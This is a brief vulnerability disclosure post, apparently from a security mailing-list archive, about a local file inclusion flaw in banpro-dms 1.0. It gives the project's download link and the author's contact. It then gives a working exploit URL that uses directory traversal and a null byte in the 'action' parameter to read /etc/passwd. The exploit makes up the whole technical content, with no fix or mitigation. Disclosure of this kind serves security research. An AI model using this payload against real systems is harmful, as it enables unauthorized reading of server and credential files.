<<< Date Index >>>     <<< Thread Index >>>

banpro-dms 1.0 local file inclusion vulnerability



banpro-dms 1.0 local file inclusion vulnerability

download   http://sourceforge.net/projects/banprodms

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploit
http://localhost/DMS/index.php?action=../../../../../../../../../../etc/passwd%00